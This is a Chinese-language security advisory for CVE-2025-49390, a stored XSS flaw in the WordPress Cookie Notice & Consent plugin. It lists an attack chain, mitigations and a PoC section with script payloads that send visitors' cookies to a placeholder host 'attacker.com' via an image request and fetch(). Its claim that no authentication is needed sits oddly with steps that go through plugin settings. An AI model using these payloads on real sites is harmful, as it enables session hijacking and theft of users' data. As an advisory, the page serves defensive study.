CVE-2025-49390 WordPress Cookie Notice Consent插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-49390

漏洞类型

存储型XSS (Stored Cross-site Scripting)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Cookie Notice & Consent (cookie-notice-consent)

漏洞概述

CVE-2025-49390是WordPress插件Cookie Notice & Consent中存在的一个存储型跨站脚本(XSS)漏洞。该插件由christophrado开发，主要用于在WordPress网站上显示Cookie通知和获取用户同意。漏洞源于该插件对用户输入处理不当，未能正确对输入内容进行安全过滤或转义，导致恶意JavaScript代码可以被存储到数据库中。当其他用户访问包含恶意代码的页面时，攻击者注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、恶意重定向等安全风险。由于该插件广泛部署于各类WordPress网站，此漏洞可能影响大量网站的用户安全。攻击者无需认证即可利用此漏洞，但需要诱导用户访问触发恶意代码的页面。CVSS评分7.1属于高危级别，评分向量显示攻击复杂度低、无需特殊权限，但需要用户交互才能完成攻击链。

技术细节

该存储型XSS漏洞存在于Cookie Notice & Consent插件的输入处理环节。攻击者可以通过向插件的相关功能点（如Cookie通知配置、同意按钮文本等）提交包含恶意JavaScript代码的输入。由于插件在保存用户输入时未进行充分的输入验证和输出编码，这些恶意代码被直接存储到WordPress数据库中。当网站前端加载Cookie通知组件时，存储的恶意代码会随页面内容一同被输出到HTML中，浏览器将其作为合法脚本执行。攻击者可利用此漏洞窃取用户Cookies（包括认证Cookie）、劫持用户会话、修改页面内容显示钓鱼信息，或将用户重定向至恶意网站。由于攻击代码永久存储在数据库中，即使原始攻击向量已修复，受感染的数据仍可能被利用，因此需要彻底清理数据库中的恶意内容才能完全消除风险。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Cookie Notice & Consent插件版本，确认插件版本<=1.6.4

STEP 2

步骤2: 漏洞探测

攻击者访问插件设置页面，尝试在各个输入字段中注入XSS测试载荷，观察是否存在过滤机制

STEP 3

步骤3: 恶意载荷注入

攻击者向插件的输入字段（如通知文本、按钮文本等）提交包含恶意JavaScript代码的请求，将载荷永久存储到数据库

STEP 4

步骤4: 载荷触发

当网站用户访问包含Cookie通知的前端页面时，存储的恶意代码随页面HTML一同加载并在用户浏览器中执行

STEP 5

步骤5: 恶意行为执行

注入的JavaScript代码执行，攻击者可窃取用户Cookie、会话令牌，或执行其他恶意操作

STEP 6

步骤6: 数据外传

攻击者将窃取的敏感信息通过HTTP请求发送到攻击者控制的外部服务器，完成数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-49390 Stored XSS PoC -->
<!-- This PoC demonstrates the stored XSS vulnerability in Cookie Notice & Consent plugin -->
<!-- Inject the following payload through the plugin's input fields -->

<!-- Basic XSS Payload -->
<script>alert('XSS')</script>

<!-- Cookie Theft Payload -->
<script>
  var cookies = document.cookie;
  var img = new Image();
  img.src = 'https://attacker.com/log?c=' + encodeURIComponent(cookies);
</script>

<!-- Session Hijacking Payload -->
<script>
  fetch('https://attacker.com/steal?data=' + btoa(document.cookie));
</script>

<!-- Steps to exploit:
1. Identify the Cookie Notice & Consent plugin on target WordPress site
2. Navigate to plugin settings (usually under Settings > Cookie Notice)
3. Inject XSS payload into available input fields (e.g., notification text, button labels)
4. Save the settings - payload is now stored in database
5. When any user visits the site, the XSS payload will execute in their browser
-->

影响范围

Cookie Notice & Consent <= 1.6.4

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1) 临时禁用Cookie Notice & Consent插件，使用其他替代方案；2) 限制管理员以外用户访问插件设置页面；3) 部署Web应用防火墙(WAF)规则过滤恶意脚本内容；4) 实施严格的CSP策略限制脚本执行；5) 加强服务器端输入验证，对所有用户输入进行严格过滤；6) 监控网站日志关注异常请求模式。修复后需清理数据库中可能已存在的恶意载荷。